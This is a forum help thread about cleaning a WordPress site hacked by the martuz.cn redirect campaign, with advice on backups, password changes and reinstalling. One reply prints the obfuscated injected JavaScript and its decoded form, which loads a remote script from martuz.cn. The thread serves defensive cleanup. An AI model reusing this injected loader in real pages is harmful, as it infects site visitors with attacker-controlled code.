[SPLIT] garethplu

[garethplu]

If someones website goes to "martuz.cn" what can they do to fix it?

[MysteryFCM]

1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lockdown ALL scripts (JS and PHP etc), and change FTP etc passwords

[garethplu]

Thanks, how can I do that?  Is there a step-by-step guide I can follow for someone with basic skills.  Will my website host be able to help also?

[MysteryFCM]

Your host may have a backup, but you shouldn't rely on that. They will however, be able to reset your FTP etc passwords for you.

If you don't have a clean copy of the websites files (e.g. stored locally on your computer), then your choices are severely limited as they are;

1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch

[garethplu]

How do I know what the malicious source code is?

[MysteryFCM]

Can you post the URL to your website?

[garethplu]

http://www.stadiatech.com

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

MysteryFCM: URL disabled

[MysteryFCM]

Looking at your sites source code, shows the following;

Code: [Select]

(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);

Which decodes to;

Code: [Select]

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, aslong as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.

On your homepage, this script appears just next to the "HEAD" HTML tag;

[MysteryFCM]

The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!

It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)

[MysteryFCM]

Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)

[SysAdMini]

I recommend to delete all files at your site and to restore everything
from a clean backup. Some php files have been added by this malware, for
example /images/gifimg.php. I don't recommend to sort out the files manually.

Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly why you are doing.

[garethplu]

If it comes to it can I pay someone to fix this and similiar problems?

[MysteryFCM]

Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.

[garethplu]

Cheers dude, the world needs more people like you.

I shall speak with the host and see what they say.  The RSS no longer works, do you think its related?

[MysteryFCM]

More than likely, yes.